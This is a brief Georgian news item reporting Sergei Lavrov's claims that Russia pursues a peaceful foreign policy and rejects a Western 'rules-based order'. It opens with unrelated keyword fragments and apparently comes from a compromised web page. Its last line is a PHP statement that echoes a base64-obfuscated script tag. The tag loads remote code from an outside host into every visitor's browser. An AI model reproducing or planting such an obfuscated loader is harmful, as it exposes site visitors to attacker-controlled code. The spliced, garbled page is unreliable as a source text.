celsiusi
ავერსი საქკაბელი
რუსეთის საგარეო საქმეთა მინისტრის სერგეი ლავროვის მტკიცებით, რუსეთი ინარჩუნებს მშვიდობისმოყვარე საგარეო პოლიტიკას და მხარს უჭერს გამაერთიანებელ რეგიონულ დღის წესრიგს.
 
”რუსეთი უდიდესი სახელმწიფოა, რომელიც აგრძელებს მშვიდობიანი საგარეო პოლიტიკის გატარებას, ხელს უწყობს პოზიტიური, გამაერთიანებელი, წინდახედული გლობალური და რეგიონული დღის წესრიგის განვითარებას”, - აღნიშნა ლავროვმა.
 
მისი თქმით, რუსეთი „მტკიცედ ერთგულია საერთაშორისო კომუნიკაციის ფუნდამენტური პრინციპების მიმართ, რომლებსაც გაერო-ს წესდება ითვალისწინებს, უპირველეს ყოვლისა, როგორც დიდი, ისე პატარა სახელმწიფოების სუვერენული თანასწორობის მიმართ“.
 
„ჩვენ მხარს ვუჭერთ ხალხთა კულტურული და ცივილიზაციური მრავალფეროვნების პატივისცემას, მათ უფლებას, თავად განსაზღვრონ საკუთარი ბედი. ამავდროულად, კატეგორიულად უარვყოფთ შეერთებული შტატების ხელმძღვანელობით „კოლექტიური დასავლეთის“ მიერ დაწესებულ ნეოკოლონიალურ „წესებზე დაფუძნებულ წესრიგს“, - აღნიშნა ლავროვმა.
620
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");